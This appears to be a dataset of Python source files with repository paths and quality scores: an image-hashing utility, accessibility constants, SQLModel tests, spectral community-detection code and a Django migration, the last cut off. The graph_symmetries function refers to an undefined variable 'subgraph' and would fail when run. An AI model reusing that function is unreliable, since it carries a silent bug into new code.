# If a file path is passed in, hash the file in 4kB chunks
elif isinstance(image, str):
with open(image,"rb") as im:
for byte_block in iter(lambda: im.read(CHUNK_SIZE),b""):
sha.update(byte_block)
else:
raise TypeError('image must be a numpy ndarray (frame)',
'or str (file path)')
return sha.hexdigest() | imaging_db/utils/meta_utils.py | import numpy as np
import pandas as pd
import hashlib
CHUNK_SIZE = 4096
# Required metadata fields - everything else goes into a json
META_NAMES = ["ChannelIndex",
"Slice",
"FrameIndex",
"Channel",
"FileName",
"PositionIndex"]
DF_NAMES = ["channel_idx",
"slice_idx",
"time_idx",
"channel_name",
"file_name",
"pos_idx",
"sha256"]
def make_dataframe(nbr_frames=None, col_names=DF_NAMES):
"""
Create empty pandas dataframe given indices and column names
:param [None, int] nbr_frames: The number of rows in the dataframe
:param list of strs col_names: The dataframe column names
:return dataframe frames_meta: Empty dataframe with given
indices and column names
"""
if nbr_frames is not None:
# Get metadata and path for each frame
frames_meta = pd.DataFrame(
index=range(nbr_frames),
columns=col_names,
)
else:
frames_meta = pd.DataFrame(columns=col_names)
return frames_meta
def validate_global_meta(global_meta):
"""
Validate that global frames meta dictionary contain all required values.
:param dict global_meta: Global frames metadata
:raise AssertionError: if not all keys are present
"""
keys = ["storage_dir",
"nbr_frames",
"im_width",
"im_height",
"nbr_slices",
"nbr_channels",
"im_colors",
"nbr_timepoints",
"nbr_positions",
"bit_depth"]
keys_valid = np.zeros(len(keys), dtype='bool')
for idx, key in enumerate(keys):
key_valid = (key in global_meta) and \
(global_meta[key] is not None)
keys_valid[idx] = key_valid
assert np.all(keys_valid),\
"Not all required metadata keys are present"
def gen_sha256(image):
"""
Generate the sha-256 hash of an image. If the user
passes in a numpy ndarray (usually a frame), hash the
whole numpy. If the user passes in a file path, the
function will hash the file in 4kB chucks
:param ndarray/String image: ndarray containing the image to hash
or string containing path to file
to hash
:return String sha256: sha-256 hash of the input image
"""
sha = hashlib.sha256()
# If a frame is passed in, hash the numpy array
if isinstance(image, np.ndarray):
sha.update(image.tobytes())
# If a file path is passed in, hash the file in 4kB chunks
elif isinstance(image, str):
with open(image,"rb") as im:
for byte_block in iter(lambda: im.read(CHUNK_SIZE),b""):
sha.update(byte_block)
else:
raise TypeError('image must be a numpy ndarray (frame)',
'or str (file path)')
return sha.hexdigest() | 0.698844 | 0.536556 |
STATE_SYSTEM = {
'UNAVAILABLE': 0x00000001, # Если этот бит в поле state кнопки 0, то текст кнопки красный (к примеру, речь о кнопке Applay)
'SELECTED': 0x00000002,
'FOCUSED': 0x00000004,
'PRESSED': 0x00000008,
'CHECKED': 0x00000010,
'MIXED': 0x00000020,
'READONLY': 0x00000040,
'HOTTRACKED': 0x00000080,
'DEFAULT': 0x00000100,
'EXPANDED': 0x00000200,
'COLLAPSED': 0x00000400,
'BUSY': 0x00000800,
'FLOATING': 0x00001000,
'MARQUEED': 0x00002000,
'ANIMATED': 0x00004000,
'INVISIBLE': 0x00008000,
'OFFSCREEN': 0x00010000,
'SIZEABLE': 0x00020000,
'MOVEABLE': 0x00040000,
'SELFVOICING': 0x00080000,
'FOCUSABLE': 0x00100000,
'SELECTABLE': 0x00200000,
'LINKED': 0x00400000,
'TRAVERSED': 0x00800000,
'MULTISELECTABLE': 0x01000000,
'EXTSELECTABLE': 0x02000000,
'ALERT_LOW': 0x04000000,
'ALERT_MEDIUM': 0x08000000,
'ALERT_HIGH': 0x10000000,
'VALID': 0x1fffffff
}
ROLE_SYSTEM = {
'ALERT': 8,
'ANIMATION': 54,
'APPLICATION': 14,
'BORDER': 19,
'BUTTONDROPDOWN': 56,
'BUTTONDROPDOWNGRID': 58,
'BUTTONMENU': 57,
'CARET': 7,
'CELL': 29,
'CHARACTER': 32,
'CHART': 17,
'CHECKBUTTON': 44,
'CLIENT': 10,
'CLOCK': 61,
'COLUMN': 27,
'COLUMNHEADER': 25,
'COMBOBOX': 46,
'CURSOR': 6,
'DIAGRAM': 53,
'DIAL': 49,
'DIALOG': 18,
'DOCUMENT': 15,
'DROPLIST': 47,
'EQUATION': 55,
'GRAPHIC': 40,
'GRIP': 4,
'GROUPING': 20,
'HELPBALLOON': 31,
'HOTKEYFIELD': 50,
'INDICATOR': 39,
'LINK': 30,
'LIST': 33,
'LISTITEM': 34,
'MENUBAR': 2,
'MENUITEM': 12,
'MENUPOPUP': 11,
'OUTLINE': 35,
'OUTLINEITEM': 36,
'PAGETAB': 37,
'PAGETABLIST': 60,
'PANE': 16,
'PROGRESSBAR': 48,
'PROPERTYPAGE': 38,
'PUSHBUTTON': 43,
'RADIOBUTTON': 45,
'ROW': 28,
'ROWHEADER': 26,
'SCROLLBAR': 3,
'SEPARATOR': 21,
'SLIDER': 51,
'SOUND': 5,
'SPINBUTTON': 52,
'STATICTEXT': 41,
'STATUSBAR': 23,
'TABLE': 24,
'TEXT': 42,
'TITLEBAR': 1,
'TOOLBAR': 22,
'TOOLTIP': 13,
'WHITESPACE': 59,
'WINDOW': 9
}
STATE_SYSTEM_rev = {val:key for (key,val) in STATE_SYSTEM.items()}
ROLE_SYSTEM_rev = {val:key for (key,val) in ROLE_SYSTEM.items()} | pikuli/uia/adapter/oleacc_h.py | STATE_SYSTEM = {
'UNAVAILABLE': 0x00000001, # Если этот бит в поле state кнопки 0, то текст кнопки красный (к примеру, речь о кнопке Applay)
'SELECTED': 0x00000002,
'FOCUSED': 0x00000004,
'PRESSED': 0x00000008,
'CHECKED': 0x00000010,
'MIXED': 0x00000020,
'READONLY': 0x00000040,
'HOTTRACKED': 0x00000080,
'DEFAULT': 0x00000100,
'EXPANDED': 0x00000200,
'COLLAPSED': 0x00000400,
'BUSY': 0x00000800,
'FLOATING': 0x00001000,
'MARQUEED': 0x00002000,
'ANIMATED': 0x00004000,
'INVISIBLE': 0x00008000,
'OFFSCREEN': 0x00010000,
'SIZEABLE': 0x00020000,
'MOVEABLE': 0x00040000,
'SELFVOICING': 0x00080000,
'FOCUSABLE': 0x00100000,
'SELECTABLE': 0x00200000,
'LINKED': 0x00400000,
'TRAVERSED': 0x00800000,
'MULTISELECTABLE': 0x01000000,
'EXTSELECTABLE': 0x02000000,
'ALERT_LOW': 0x04000000,
'ALERT_MEDIUM': 0x08000000,
'ALERT_HIGH': 0x10000000,
'VALID': 0x1fffffff
}
ROLE_SYSTEM = {
'ALERT': 8,
'ANIMATION': 54,
'APPLICATION': 14,
'BORDER': 19,
'BUTTONDROPDOWN': 56,
'BUTTONDROPDOWNGRID': 58,
'BUTTONMENU': 57,
'CARET': 7,
'CELL': 29,
'CHARACTER': 32,
'CHART': 17,
'CHECKBUTTON': 44,
'CLIENT': 10,
'CLOCK': 61,
'COLUMN': 27,
'COLUMNHEADER': 25,
'COMBOBOX': 46,
'CURSOR': 6,
'DIAGRAM': 53,
'DIAL': 49,
'DIALOG': 18,
'DOCUMENT': 15,
'DROPLIST': 47,
'EQUATION': 55,
'GRAPHIC': 40,
'GRIP': 4,
'GROUPING': 20,
'HELPBALLOON': 31,
'HOTKEYFIELD': 50,
'INDICATOR': 39,
'LINK': 30,
'LIST': 33,
'LISTITEM': 34,
'MENUBAR': 2,
'MENUITEM': 12,
'MENUPOPUP': 11,
'OUTLINE': 35,
'OUTLINEITEM': 36,
'PAGETAB': 37,
'PAGETABLIST': 60,
'PANE': 16,
'PROGRESSBAR': 48,
'PROPERTYPAGE': 38,
'PUSHBUTTON': 43,
'RADIOBUTTON': 45,
'ROW': 28,
'ROWHEADER': 26,
'SCROLLBAR': 3,
'SEPARATOR': 21,
'SLIDER': 51,
'SOUND': 5,
'SPINBUTTON': 52,
'STATICTEXT': 41,
'STATUSBAR': 23,
'TABLE': 24,
'TEXT': 42,
'TITLEBAR': 1,
'TOOLBAR': 22,
'TOOLTIP': 13,
'WHITESPACE': 59,
'WINDOW': 9
}
STATE_SYSTEM_rev = {val:key for (key,val) in STATE_SYSTEM.items()}
ROLE_SYSTEM_rev = {val:key for (key,val) in ROLE_SYSTEM.items()} | 0.198996 | 0.134151 |
from typing import Any, Dict, List, Union
from unittest.mock import patch
from sqlmodel import create_engine
from tests.conftest import get_testing_print_function
def check_calls(calls: List[List[Union[str, Dict[str, Any]]]]):
assert calls[0] == ["Before interacting with the database"]
assert calls[1] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[2] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[3] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[4] == ["After adding to the session"]
assert calls[5] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[6] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[7] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[8] == ["After committing the session"]
assert calls[9] == ["Hero 1:", {}]
assert calls[10] == ["Hero 2:", {}]
assert calls[11] == ["Hero 3:", {}]
assert calls[12] == ["After committing the session, show IDs"]
assert calls[13] == ["Hero 1 ID:", 1]
assert calls[14] == ["Hero 2 ID:", 2]
assert calls[15] == ["Hero 3 ID:", 3]
assert calls[16] == ["After committing the session, show names"]
assert calls[17] == ["Hero 1 name:", "Deadpond"]
assert calls[18] == ["Hero 2 name:", "Spider-Boy"]
assert calls[19] == ["Hero 3 name:", "Rusty-Man"]
assert calls[20] == ["After refreshing the heroes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[24] == ["After the session closes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
def test_tutorial_001(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial001 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls)
def test_tutorial_002(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial002 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls) | tests/test_tutorial/test_automatic_id_none_refresh/test_tutorial001_tutorial002.py | from typing import Any, Dict, List, Union
from unittest.mock import patch
from sqlmodel import create_engine
from tests.conftest import get_testing_print_function
def check_calls(calls: List[List[Union[str, Dict[str, Any]]]]):
assert calls[0] == ["Before interacting with the database"]
assert calls[1] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[2] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[3] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[4] == ["After adding to the session"]
assert calls[5] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[6] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[7] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[8] == ["After committing the session"]
assert calls[9] == ["Hero 1:", {}]
assert calls[10] == ["Hero 2:", {}]
assert calls[11] == ["Hero 3:", {}]
assert calls[12] == ["After committing the session, show IDs"]
assert calls[13] == ["Hero 1 ID:", 1]
assert calls[14] == ["Hero 2 ID:", 2]
assert calls[15] == ["Hero 3 ID:", 3]
assert calls[16] == ["After committing the session, show names"]
assert calls[17] == ["Hero 1 name:", "Deadpond"]
assert calls[18] == ["Hero 2 name:", "Spider-Boy"]
assert calls[19] == ["Hero 3 name:", "Rusty-Man"]
assert calls[20] == ["After refreshing the heroes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[24] == ["After the session closes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
def test_tutorial_001(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial001 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls)
def test_tutorial_002(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial002 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls) | 0.77569 | 0.584093 |
import itertools
import numpy
import networkx as nx
from Queue import Queue
def graph_symmetries(graph):
"""
Finds all symmetries of a graph. This is computationally very expensive
O(N!) where N is the number of nodes in graph.
"""
permutations = [dict(zip(graph.nodes_iter(), perm)) for perm in
itertools.permutations(graph.nodes_iter())]
keys = subgraph.nodes()
keys.sort()
symmetries = [[perm[node] for node in keys] for perm in permutations if
all(graph.has_edge(perm[src], perm[tar])
for (src, tar) in graph.edges_iter())]
return symmetries
def kernighan_lin_refinement(s, b):
"""
Parameters
----------
s: array-like
State vector partitioning the nodes into communities (contains 1s and
-1s).
b: matrix
Modularity matrix.
"""
dot = numpy.dot
def flip(v, pos):
v[pos] = -v[pos]
dq = dot(v, dot(b.A, v))
v[pos] = -v[pos]
return dq
s_len = len(s)
trials = numpy.zeros(s_len)
q_max = dot(s, dot(b.A, s))
while True:
for i in xrange(s_len):
trials[i] = flip(s, i)
dq = trials.max()
if dq > q_max:
i = trials.argmax()
s[i] = -s[i]
q_max = dq
else:
break
def spectral_community_detection(graph, weighted=True, threshold=1E-12,
error_margin=1E-12, refine=True, max_iter=500):
"""
Finds communities in a graph via spectral partitioning.
Requires a graph whose nodes are integers from 0 to (number of nodes - 1).
"""
dot = numpy.dot
norm = numpy.linalg.norm
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= sub_b[i, :].sum()
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# # find the dominant eigenvector by power method as in eq. 7
# vec_new = numpy.ones(len_nodes)
## vec_new = numpy.random.random_sample(len_nodes)
## vec_new /= norm(vec_new)
# for i in range(max_iter):
# vec_old = vec_new
## vec_new = dot(sub_adj.A, vec_old) - (dot(deg, dot(deg, vec_old)) / m2)
# vec_new = dot(sub_b.A, vec_old)
# vec_new /= norm(vec_new)
## if abs(vec_new - vec_old).sum() < threshold:
# if (norm(vec_new - vec_old) / norm(vec_old)) < threshold:
# break
# if i == max_iter:
# raise UtilsError("power method failed to converge")
# # convert to sign vector as defined on pg. 8579
# s = array([(1 if x > 0 else -1) for x in vec_new])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= error_margin:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return [group1, group2]
if graph.is_directed():
raise nx.NetworkXError("only undirected graphs are allowed")
# basic measures
n = graph.order()
m2 = graph.size() * 2.0
m4 = m2 * 2.0
if n == 0 or m2 == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# store the degree of each node in an array at corresponding index
degrees = adj.sum(axis=0).A1
# construct modularity matrix
b = adj - (kronecker(degrees, degrees) / m2).reshape(n, n)
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities)
def directed_spectral_community_detection(graph, weighted=True, threshold=1E-12,
refine=True):
"""
"""
dot = numpy.dot
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= (sub_b[i, :].sum() + sub_b[:, i].sum()) / 2.0
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= threshold:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return (group1, group2)
if not graph.is_directed():
raise nx.NetworkXError("only directed graphs are allowed")
# basic measures
n = graph.order()
m = float(graph.size())
m4 = m * 4.0
if n == 0 or m == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# networkx adjacency matrix Aij = 1 if there is a link i -> j
# the paper uses the other orientation
adj = adj.T
# store the degree of each node in an array at corresponding index
in_degrees = adj.sum(axis=0).A1
out_degrees = adj.sum(axis=1).A1
# construct modularity matrix
b = adj - (kronecker(in_degrees, out_degrees) / m).reshape(n, n)
# symmetrize
b = b + b.T
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities) | meb/utils/network/algorithms.py | import itertools
import numpy
import networkx as nx
from Queue import Queue
def graph_symmetries(graph):
"""
Finds all symmetries of a graph. This is computationally very expensive
O(N!) where N is the number of nodes in graph.
"""
permutations = [dict(zip(graph.nodes_iter(), perm)) for perm in
itertools.permutations(graph.nodes_iter())]
keys = subgraph.nodes()
keys.sort()
symmetries = [[perm[node] for node in keys] for perm in permutations if
all(graph.has_edge(perm[src], perm[tar])
for (src, tar) in graph.edges_iter())]
return symmetries
def kernighan_lin_refinement(s, b):
"""
Parameters
----------
s: array-like
State vector partitioning the nodes into communities (contains 1s and
-1s).
b: matrix
Modularity matrix.
"""
dot = numpy.dot
def flip(v, pos):
v[pos] = -v[pos]
dq = dot(v, dot(b.A, v))
v[pos] = -v[pos]
return dq
s_len = len(s)
trials = numpy.zeros(s_len)
q_max = dot(s, dot(b.A, s))
while True:
for i in xrange(s_len):
trials[i] = flip(s, i)
dq = trials.max()
if dq > q_max:
i = trials.argmax()
s[i] = -s[i]
q_max = dq
else:
break
def spectral_community_detection(graph, weighted=True, threshold=1E-12,
error_margin=1E-12, refine=True, max_iter=500):
"""
Finds communities in a graph via spectral partitioning.
Requires a graph whose nodes are integers from 0 to (number of nodes - 1).
"""
dot = numpy.dot
norm = numpy.linalg.norm
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= sub_b[i, :].sum()
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# # find the dominant eigenvector by power method as in eq. 7
# vec_new = numpy.ones(len_nodes)
## vec_new = numpy.random.random_sample(len_nodes)
## vec_new /= norm(vec_new)
# for i in range(max_iter):
# vec_old = vec_new
## vec_new = dot(sub_adj.A, vec_old) - (dot(deg, dot(deg, vec_old)) / m2)
# vec_new = dot(sub_b.A, vec_old)
# vec_new /= norm(vec_new)
## if abs(vec_new - vec_old).sum() < threshold:
# if (norm(vec_new - vec_old) / norm(vec_old)) < threshold:
# break
# if i == max_iter:
# raise UtilsError("power method failed to converge")
# # convert to sign vector as defined on pg. 8579
# s = array([(1 if x > 0 else -1) for x in vec_new])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= error_margin:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return [group1, group2]
if graph.is_directed():
raise nx.NetworkXError("only undirected graphs are allowed")
# basic measures
n = graph.order()
m2 = graph.size() * 2.0
m4 = m2 * 2.0
if n == 0 or m2 == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# store the degree of each node in an array at corresponding index
degrees = adj.sum(axis=0).A1
# construct modularity matrix
b = adj - (kronecker(degrees, degrees) / m2).reshape(n, n)
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities)
def directed_spectral_community_detection(graph, weighted=True, threshold=1E-12,
refine=True):
"""
"""
dot = numpy.dot
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= (sub_b[i, :].sum() + sub_b[:, i].sum()) / 2.0
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= threshold:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return (group1, group2)
if not graph.is_directed():
raise nx.NetworkXError("only directed graphs are allowed")
# basic measures
n = graph.order()
m = float(graph.size())
m4 = m * 4.0
if n == 0 or m == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# networkx adjacency matrix Aij = 1 if there is a link i -> j
# the paper uses the other orientation
adj = adj.T
# store the degree of each node in an array at corresponding index
in_degrees = adj.sum(axis=0).A1
out_degrees = adj.sum(axis=1).A1
# construct modularity matrix
b = adj - (kronecker(in_degrees, out_degrees) / m).reshape(n, n)
# symmetrize
b = b + b.T
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities) | 0.598782 | 0.525491 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HolviOrder',
fields=[
('code', models.CharField(max_length=32, primary_key=True, serialize=False, unique=True)),
('pool', models.CharField(max_length=32)),
('firstname', models.CharField(max_length=32)),
('lastname', models.CharField(max_length=32)),
('company', models.CharField(max_length=64)),
('email', models.CharField(max_length=64)),
('city', models.CharField(max_length=32)),
('country', models.CharField(max_length=8)),
('street', models.CharField(max_length=64)),
('postcode', models.CharField(max_length=16)),
('language', models.CharField(max_length=4)),
('phone', models.CharField(max_length=16)),
('paid', models.BooleanField()),
('create_time', models.DateTimeField()),
('paid_time', models.DateTimeField()),
],
),
migrations.CreateModel(
name='HolviPurchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('product_name', models.CharField(max_length=128)),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='purchases', to='holvi_orders.HolviOrder')),
],
),
migrations.CreateModel(
name='HolviWebshop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.UUIDField(default=uuid.uuid4)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='holvi_webshops', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='HolviPurchaseAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('answer', models.CharField(max_length=256)),
('purchase', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='answers', to='holvi_orders.HolviPurchase')),
],
),
migrations.AddField(
model_name='holviorder',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='orders', to='holvi_orders.HolviWebshop'),
),
] | django_server/holvi_orders/migrations/0001_initial.py |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HolviOrder',
fields=[
('code', models.CharField(max_length=32, primary_key=True, serialize=False, unique=True)),
('pool', models.CharField(max_length=32)),
('firstname', models.CharField(max_length=32)),
('lastname', models.CharField(max_length=32)),
('company', models.CharField(max_length=64)),
('email', models.CharField(max_length=64)),
('city', models.CharField(max_length=32)),
('country', models.CharField(max_length=8)),
('street', models.CharField(max_length=64)),
('postcode', models.CharField(max_length=16)),
('language', models.CharField(max_length=4)),
('phone', models.CharField(max_length=16)),
('paid', models.BooleanField()),
('create_time', models.DateTimeField()),
('paid_time', models.DateTimeField()),
],
),
migrations.CreateModel(
name='HolviPurchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('product_name', models.CharField(max_length=128)),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='purchases', to='holvi_orders.HolviOrder')),
],
),
migrations.CreateModel(
name='HolviWebshop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.UUIDField(default=uuid.uuid4)),
